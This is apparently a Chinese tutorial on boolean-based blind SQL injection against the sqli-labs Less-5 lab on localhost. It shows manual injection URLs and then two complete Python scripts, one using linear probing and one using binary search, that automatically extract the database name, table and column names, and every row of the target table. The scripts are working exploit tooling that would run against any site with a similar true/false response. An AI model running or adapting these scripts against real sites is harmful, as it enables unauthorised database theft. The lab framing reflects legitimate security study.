
SQL盲注--布尔盲注


布尔盲注

布尔型盲注是指页面在提交数据并与数据库交互时完全没有回显数据,只会出现数据提交正确和错误两种不同的页面(报错型注入至少会把语法错误回显在页面上),或者无法使用联合查询的情况。

这里以一道题为例学习一下

正常传参,返回如下

http://127.0.0.1/sqli/Less-5/?id=1

存在注入点

http://127.0.0.1/sqli/Less-5/?id=1'

查字段数

http://127.0.0.1/sqli/Less-5/?id=1' order by 3--+

查数据库版本

http://127.0.0.1/sqli/Less-5/?id=1' and left((select version()),1)='5' --+

查数据库长度

这里需要一个一个试

http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+

查数据库名

因为没有回显,所以不能像以前那样注入,这里使用left函数逐位爆破数据库名,当结果正确时页面返回 You are in……

http://127.0.0.1/sqli/Less-5/?id=1' and left((select database()),1)='s' --+

结果不正确时页面什么也不返回

http://127.0.0.1/sqli/Less-5/?id=1' and left((select database()),1)='w' --+

脚本

手工爆破太麻烦,反正我是不会用手工去爆破,这里尝试使用脚本去爆破

第一种是逐个字符比较去爆破,特别慢,不推荐这种方式,大约需要半天。

import requests

def db_ascii_list():
    """Return the printable ASCII candidates '!' .. '~' (codes 33-126) as a list.

    This is the alphabet every character-by-character probe iterates over;
    space (32) and DEL (127) fall outside the range and are never tried.
    """
    return [chr(code) for code in range(33, 127)]

def db_length(url, str, ascii_list):
    """Find length(database()) by counting upward from 1 until the page matches.

    Args:
        url: base request URL; the injection suffix is appended verbatim.
        str: marker substring (shadows the builtin) whose presence in the
            response body identifies a "true" page.
        ascii_list: unused here; kept so every helper has a uniform signature.

    Returns:
        The first candidate length whose probe produced a matching page.

    NOTE(review): there is no upper bound -- if the marker never appears
    (changed page text, blocked requests) the loop does not terminate.
    """
    print("[-]开始爆破数据库名长度.......")
    candidate = 1
    while True:
        probe = url + "' and length(database())=%d --+" % candidate
        if str in requests.get(probe).text:
            break
        candidate += 1
    print("[+]数据库长度:%d\n" % candidate)
    return candidate

def db_name(url, str, ascii_list, db_length):
    """Recover database() one position at a time by equality probes.

    For each position 1..db_length every candidate in ascii_list is tried in
    order and the first one whose page contains `str` is taken.  A position
    for which no candidate matches contributes nothing, so the result can be
    shorter than db_length.
    """
    print("[-]开始爆破数据库名.......")
    recovered = []
    for position in range(1, db_length + 1):
        for candidate in ascii_list:
            probe = url + "' and ord(mid((database()),%d,1))=%d --+" % (position, ord(candidate))
            if str in requests.get(probe).text:
                recovered.append(candidate)
                break
    name = ''.join(recovered)
    print("[+]数据库名:%s\n" % name)
    return name

def tb_number(url, str, db_name):
    """Count the tables of db_name by testing count(table_name)=1,2,... upward.

    db_name is interpolated unescaped into a quoted SQL literal, so a name
    containing a quote breaks the query.  Counting starts at 1 and has no
    upper bound, so an empty schema or a non-matching page never terminates.
    """
    print("[-]开始爆破%s数据库有几张表........" % db_name)
    guess = 0
    while True:
        guess += 1
        probe = url + "' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+" % (db_name, guess)
        if str in requests.get(probe).text:
            break
    print("[+]%s库一共有%d张表\n" % (db_name, guess))
    return guess

def tb_name_length(url, str, db_name, tb_number):
    """Return the length of each table name in db_name, in `limit i,1` order.

    Each table gets its own linear upward count starting at 1 (the original
    reset the shared counter after every hit, which is the same thing).
    Unbounded if a length never matches.
    """
    print("[-]开始爆破表名长度")
    lengths = []
    for index in range(tb_number):
        guess = 1
        while True:
            probe = url + "' and (select length(table_name) from information_schema.tables where table_schema='%s' limit %d,1)=%d --+" % (db_name, index, guess)
            if str in requests.get(probe).text:
                lengths.append(guess)
                break
            guess += 1
    print("[+]表名长度:%s" % lengths)
    return lengths

def tb_name(url, str, ascii_list, db_name, tb_number, tb_name_length):
    """Recover every table name of db_name, one character at a time.

    tb_name_length[i] is the already-probed length of table i.  Every probe
    URL is echoed to stdout after it has been sent, so output is verbose.  A
    position for which no candidate matches is silently skipped.
    """
    print("[-]开始爆破表名")
    names = []
    for index in range(tb_number):
        chars = []
        for position in range(1, tb_name_length[index] + 1):
            for candidate in ascii_list:
                probe = url + "' and ord(mid((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))=%d --+" % (db_name, index, position, ord(candidate))
                page = requests.get(probe).text
                print(probe)
                if str in page:
                    chars.append(candidate)
                    break
        names.append(''.join(chars))
    print("\n[+]%s库下的%d张表为:%s\n" % (db_name, tb_number, names))
    return names

def column_num(url, str, tb_name_list):
    """Return the column count of every table in tb_name_list (same order).

    The probe filters information_schema.columns by table_name only, not by
    schema, so a table name present in several schemas is counted across all
    of them.  Counting starts at 1 with no upper bound.
    """
    print("[-]开始爆破每张表的字段数量........")
    counts = []
    for table in tb_name_list:
        guess = 1
        while True:
            probe = url + "' and (select count(column_name) from information_schema.columns where table_name='%s')=%d --+" % (table, guess)
            if str in requests.get(probe).text:
                counts.append(guess)
                print("[+]%s表对应字段数为:%d" % (table, guess))
                break
            guess += 1
    print("\n[+]%s表对应的字段数:%s\n" % (tb_name_list, counts))
    return counts

def column_name_length(url, str, tb_name_list, column_num):
    """Probe the length of every column name, then return only the 4th table's.

    The flat list of lengths is split by the per-table counts in column_num.
    The split and the four summary prints are hard-wired to exactly four
    tables (the sqli-labs layout): fewer tables raise IndexError, more are
    folded into the last slice.
    """
    print("[-]开始爆破每张表的字段长度:")
    lengths = []
    for table_index in range(len(tb_name_list)):
        for col_index in range(column_num[table_index]):
            guess = 1
            while True:
                probe = url + "' and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d --+" % (tb_name_list[table_index], col_index, guess)
                if str in requests.get(probe).text:
                    lengths.append(guess)
                    break
                guess += 1
    # cumulative offsets of each table's slice inside `lengths`
    first_end = column_num[0]
    second_end = first_end + column_num[1]
    third_end = second_end + column_num[2]
    per_table = [
        lengths[:first_end],
        lengths[first_end:second_end],
        lengths[second_end:third_end],
        lengths[third_end:],
    ]
    for table_index, table_lengths in enumerate(per_table):
        print("[+]%s表的%d个字段的字段长度分别为:%s" % (tb_name_list[table_index], column_num[table_index], table_lengths))
    return per_table[3]

def column_name(url, str, ascii_list, tb_name_list, us_list_length):
    """Recover the column names of the fourth table (tb_name_list[3]) only.

    us_list_length[i] is the already-probed length of column i.  Each probe
    URL is printed before it is sent.  Positions with no matching candidate
    are skipped silently.
    """
    print("[-]开始爆破%s表的字段名:" % (tb_name_list[3]))
    names = []
    for col_index, length in enumerate(us_list_length):
        chars = []
        for position in range(1, length + 1):
            for candidate in ascii_list:
                probe = url + "' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d --+" % (tb_name_list[3], col_index, position, ord(candidate))
                print(probe)
                if str in requests.get(probe).text:
                    chars.append(candidate)
                    break
        names.append(''.join(chars))
    print("[+]%s表的字段名分别为:%s" % (tb_name_list[3], names))
    return names

def data_num(url, str, tb_list_name, db_name):
    """Count rows of db_name.<fourth table> by testing count(*)=1,2,... upward.

    Each probe URL is printed before it is sent.  Counting starts at 1 with
    no upper bound, so an empty table or a non-matching page never returns.
    """
    print('[-]开始爆破%s数据库的%s表有几条数据:' % (db_name, tb_list_name[3]))
    guess = 1
    while True:
        probe = url + "' and (select count(*) from %s.%s)=%d --+" % (db_name, tb_list_name[3], guess)
        print(probe)
        if str in requests.get(probe).text:
            break
        guess += 1
    print('[+]%s数据库的%s表有%d条数据' % (db_name, tb_list_name[3], guess))
    return guess

def dump_data(url,str,tb_name_list,db_name,column_name_list,data_num,ascii_list):
    """Dump every cell of db_name.<tb_name_list[3]> and print it as a table.

    For each column in column_name_list and each row 0..data_num-1 the cell
    length is probed first, then each character is matched against
    ascii_list by equality.  Cells are appended column-major to
    dump_data_list.  The final print is hard-wired to 13 rows x 3 columns
    (indices i, 13+i, 26+i), i.e. the sqli-labs users table, and raises
    IndexError for any other shape.  Returns None.
    """
    print("[-]开始爆破%s数据库的%s表中数据:"%(db_name,tb_name_list[3]))
    k=1  # shared length counter; reset to 1 after every cell
    data_length=[]  # length of every cell in probe order; filled but never read
    dump_data_list=[]
    dump_data=''
    for i in column_name_list:
        for j in range(data_num):
            # Length probe has no comparison: the page reads "true" while
            # position k exists (ascii() non-zero), so the first k without
            # the marker is one past the end.
            while True:
                dump_data_length_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1)) --+"%(i,db_name,tb_name_list[3],j,k)
                #print(dump_data_length_payload)
                r=requests.get(dump_data_length_payload)
                if str not in r.text:
                    dump_data_length=k-1
                    k=1
                    break
                else:
                    k+=1
            data_length.append(dump_data_length)
            # Character probe: first candidate whose code equals the cell's
            # character at position l; a position with no match leaves a gap.
            for l in range(1,dump_data_length+1):
                for c in ascii_list:
                    dump_data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d --+"%(i,db_name,tb_name_list[3],j,l,ord(c))
                    #print(dump_data_payload)
                    r=requests.get(dump_data_payload)
                    if str in r.text:
                        dump_data+=c
                        break
                    else:
                        pass
            dump_data_list.append(dump_data)
            dump_data=''
    print( dump_data_list)
    print("[+]%s数据库的%s表的数据:"%(db_name,tb_name_list[3]))
    # Fixed 13x3 layout: row i of column 0, 1 and 2.
    for i in range(13):
        print("%s\t%s\t%s"%(dump_data_list[i],dump_data_list[13+i],dump_data_list[26+i]))
    print( dump_data_list)

url="http://127.0.0.1/sqli/Less-5/?id=1"  # target URL: a local sqli-labs lesson
str="You are in"  # marker that distinguishes a "true" page (shadows builtin str for the rest of the module)
# NOTE(review): every assignment below rebinds a function's own name to its
# return value, so none of the helpers can be called a second time; the whole
# chain runs at import time.  Each step issues one GET per candidate, with
# `--+` / `information_schema` fragments in the `id` parameter -- a pattern
# that is easy to spot in access logs or with WAF rules.
ascii_list=db_ascii_list()
db_length=db_length(url,str,ascii_list)
db_name=db_name(url,str,ascii_list,db_length)
tb_number=tb_number(url,str,db_name)
tb_name_length=tb_name_length(url,str,db_name,tb_number)
tb_name_list=tb_name(url,str,ascii_list,db_name,tb_number,tb_name_length)
column_num=column_num(url,str,tb_name_list)
us_list_length=column_name_length(url,str,tb_name_list,column_num)
column_name_list=column_name(url,str,ascii_list,tb_name_list,us_list_length)
data_num=data_num(url,str,tb_name_list,db_name)
dump_data(url,str,tb_name_list,db_name,column_name_list,data_num,ascii_list)

第二种是通过二分法爆破,比较快,这个代码可能比较全了吧,如果师傅们发现有其他问题,欢迎指正。大约需要1个小时爆出来。

import requests

def db_length(url, str):
    """Return length(database()) found by linear upward search starting at 1.

    `str` (shadows the builtin) is the marker substring whose presence in
    the response body identifies a "true" page.  No upper bound: a page
    that never matches keeps the loop running.
    """
    print("[-]开始爆破数据库名长度.......")
    length = 0
    matched = False
    while not matched:
        length += 1
        probe = url + "' and length(database())=%d --+" % length
        matched = str in requests.get(probe).text
    print("[+]数据库长度:%d\n" % length)
    return length

def db_name(url, str, db_length):
    """Recover database() one position at a time by binary search on ord().

    Each position keeps the invariant "ord > lo is true, ord > hi is false"
    and narrows (lo, hi) until hi == lo + 1, at which point hi is the code.
    The initial bounds 33/127 are assumed, never tested: a code of 33 or
    below comes out as chr(34) and a code of 127 or above as chr(127).
    """
    print("[-]开始爆破数据库名.......")
    recovered = []
    for position in range(1, db_length + 1):
        lo, hi = 33, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            probe = url + "' and ord(mid((database()),%d,1))>%d --+" % (position, mid)
            if str in requests.get(probe).text:
                lo = mid
            else:
                hi = mid
        recovered.append(chr(hi))
    name = ''.join(recovered)
    print("[+]数据库名:%s\n" % name)
    return name

def tb_number(url, str, db_name):
    """Count the tables of db_name by testing count(table_name)=1,2,... upward.

    db_name is interpolated unescaped into a quoted SQL literal.  Counting
    starts at 1 with no upper bound, so an empty schema never returns.
    """
    print("[-]开始爆破%s数据库有几张表........" % db_name)
    count = 1
    while str not in requests.get(url + "' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+" % (db_name, count)).text:
        count += 1
    print("[+]%s库一共有%d张表\n" % (db_name, count))
    return count

def tb_name_length(url, str, db_name, tb_number):
    """Return the length of each of the tb_number table names of db_name.

    Tables are addressed by `limit i,1`; each gets a fresh linear upward
    count from 1 (equivalent to the original's shared counter that was reset
    on every hit).  Unbounded if a length never matches.
    """
    print("[-]开始爆破表名长度")

    def length_of(index):
        guess = 1
        while True:
            probe = url + "' and (select length(table_name) from information_schema.tables where table_schema='%s' limit %d,1)=%d --+" % (db_name, index, guess)
            if str in requests.get(probe).text:
                return guess
            guess += 1

    lengths = [length_of(index) for index in range(tb_number)]
    print("[+]表名长度:%s" % lengths)
    return lengths

def tb_name(url, str, db_name, tb_number, tb_name_length):
    """Recover every table name of db_name by per-character binary search.

    tb_name_length[i] is the already-probed length of table i.  Each
    character is found by narrowing an (lo, hi) pair on `ord(...) > mid`
    until hi == lo + 1; the assumed bounds 33/127 are never verified.
    """
    print("[-]开始爆破表名")

    def char_at(index, position):
        lo, hi = 33, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            probe = url + "' and ord(mid((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))>%d --+" % (db_name, index, position, mid)
            if str in requests.get(probe).text:
                lo = mid
            else:
                hi = mid
        return chr(hi)

    names = []
    for index in range(tb_number):
        names.append(''.join(char_at(index, position) for position in range(1, tb_name_length[index] + 1)))
    print("\n[+]%s库下的%d张表为:%s\n" % (db_name, tb_number, names))
    return names

def column_num(url, str, tb_name_list):
    """Return the column count of every table in tb_name_list (same order).

    Filters information_schema.columns by table_name only (no schema), so a
    name that exists in several schemas is counted across all of them.
    Counting starts at 1 with no upper bound.
    """
    print("[-]开始爆破每张表的字段数量........")
    counts = []
    for table in tb_name_list:
        guess = 1
        while str not in requests.get(url + "' and (select count(column_name) from information_schema.columns where table_name='%s')=%d --+" % (table, guess)).text:
            guess += 1
        counts.append(guess)
        print("[+]%s表对应字段数为:%d" % (table, guess))
    print("\n[+]%s表对应的字段数:%s\n" % (tb_name_list, counts))
    return counts

def column_name_length(url, str, tb_name_list, column_num):
    """Probe the length of every column name; return the fourth table's list.

    All lengths are collected flat and then sliced by the per-table counts.
    Slicing and the four summary prints assume exactly four tables (the
    sqli-labs layout); fewer raise IndexError, more fold into the last slice.
    """
    print("[-]开始爆破每张表的字段长度:")
    found = []
    for table_index in range(len(tb_name_list)):
        for col_index in range(column_num[table_index]):
            guess = 1
            while str not in requests.get(url + "' and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d --+" % (tb_name_list[table_index], col_index, guess)).text:
                guess += 1
            found.append(guess)
    c0, c1, c2 = column_num[0], column_num[1], column_num[2]
    first = found[:c0]
    second = found[c0:c0 + c1]
    third = found[c0 + c1:c0 + c1 + c2]
    fourth = found[c0 + c1 + c2:]
    print("[+]%s表的%d个字段的字段长度分别为:%s" % (tb_name_list[0], c0, first))
    print("[+]%s表的%d个字段的字段长度分别为:%s" % (tb_name_list[1], c1, second))
    print("[+]%s表的%d个字段的字段长度分别为:%s" % (tb_name_list[2], c2, third))
    print("[+]%s表的%d个字段的字段长度分别为:%s" % (tb_name_list[3], column_num[3], fourth))
    return fourth

def column_name(url, str, tb_name_list, us_list_length):
    """Recover the column names of tb_name_list[3] by per-character binary search.

    us_list_length[i] is the already-probed length of column i.  Every probe
    URL is printed before it is sent.  The assumed bounds 33/127 are never
    verified.
    """
    target = tb_name_list[3]
    print("[-]开始爆破%s表的字段名:" % (target))
    names = []
    for col_index, length in enumerate(us_list_length):
        chars = []
        for position in range(1, length + 1):
            lo, hi = 33, 127
            while hi - lo > 1:
                mid = (lo + hi) // 2
                probe = url + "' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))>%d --+" % (target, col_index, position, mid)
                print(probe)
                if str in requests.get(probe).text:
                    lo = mid
                else:
                    hi = mid
            chars.append(chr(hi))
        names.append(''.join(chars))
    print("[+]%s表的字段名分别为:%s" % (target, names))
    return names

def data_num(url, str, tb_list_name, db_name):
    """Count rows of db_name.<fourth table> by testing count(*)=1,2,... upward.

    Each probe URL is printed before it is sent.  Starts at 1 with no upper
    bound, so an empty table never returns.
    """
    table = tb_list_name[3]
    print('[-]开始爆破%s数据库的%s表有几条数据:' % (db_name, table))
    count = 0
    while True:
        count += 1
        probe = url + "' and (select count(*) from %s.%s)=%d --+" % (db_name, table, count)
        print(probe)
        if str in requests.get(probe).text:
            break
    print('[+]%s数据库的%s表有%d条数据' % (db_name, table, count))
    return count

def dump_data(url,str,tb_name_list,db_name,column_name_list,data_num):
    """Dump every cell of db_name.<tb_name_list[3]> and print it as a table.

    For each column in column_name_list and each row 0..data_num-1 the cell
    length is probed first (linear), then each character is found by binary
    search on ord() between the assumed bounds 33 and 127.  Cells are
    appended column-major to dump_data_list.  The final print is hard-wired
    to 13 rows x 3 columns (indices i, 13+i, 26+i), i.e. the sqli-labs users
    table, and raises IndexError for any other shape.  Returns None.
    """
    print("[-]开始爆破%s数据库的%s表中数据:"%(db_name,tb_name_list[3]))
    k=1  # shared length counter; reset to 1 after every cell
    data_length=[]  # length of every cell in probe order; filled but never read
    dump_data_list=[]
    dump_data=''
    for i in column_name_list:
        for j in range(data_num):
            # Length probe has no comparison: the page reads "true" while
            # position k exists (ascii() non-zero), so the first k without
            # the marker is one past the end.
            while True:
                dump_data_length_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1)) --+"%(i,db_name,tb_name_list[3],j,k)
                #print(dump_data_length_payload)
                r=requests.get(dump_data_length_payload)
                if str not in r.text:
                    dump_data_length=k-1
                    k=1
                    break
                else:
                    k+=1
            data_length.append(dump_data_length)
            for l in range(1,dump_data_length+1):
                # Invariant: ord > min is true, ord > max is false; stops at
                # max == min + 1 and takes max.  Codes <= 33 or >= 127 are
                # outside the assumed range and come out wrong.
                max=127
                min=33
                while abs(max-min)>1:
                    midx=int((max+min)/2)
                    dump_data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))>%d --+"%(i,db_name,tb_name_list[3],j,l,midx)
                    #print(dump_data_payload)
                    r=requests.get(dump_data_payload)
                    if str in r.text:
                        min=midx
                    else:
                        max=midx
                dump_data+=chr(max)
            dump_data_list.append(dump_data)
            dump_data=''
    #print( dump_data_list)
    print("[+]%s数据库的%s表的数据:"%(db_name,tb_name_list[3]))
    # Fixed 13x3 layout: row i of column 0, 1 and 2.
    for i in range(13):
        print("%s\t%s\t%s"%(dump_data_list[i],dump_data_list[13+i],dump_data_list[26+i]))
    #print( dump_data_list)

url="http://127.0.0.1/sqli/Less-5/?id=1"  # target URL: a local sqli-labs lesson
str="You are in"  # marker that distinguishes a "true" page (shadows builtin str for the rest of the module)
# NOTE(review): every assignment below rebinds a function's own name to its
# return value, so none of the helpers can be called a second time; the whole
# chain runs at import time.  Each character costs several GETs (one per
# bisection step) whose `id` parameter carries `--+` / `information_schema`
# fragments -- a pattern that is easy to spot in access logs or with WAF rules.
db_length=db_length(url,str)
db_name=db_name(url,str,db_length)
tb_number=tb_number(url,str,db_name)
tb_name_length=tb_name_length(url,str,db_name,tb_number)
tb_name_list=tb_name(url,str,db_name,tb_number,tb_name_length)
column_num=column_num(url,str,tb_name_list)
us_list_length=column_name_length(url,str,tb_name_list,column_num)
column_name_list=column_name(url,str,tb_name_list,us_list_length)
data_num=data_num(url,str,tb_name_list,db_name)
dump_data(url,str,tb_name_list,db_name,column_name_list,data_num)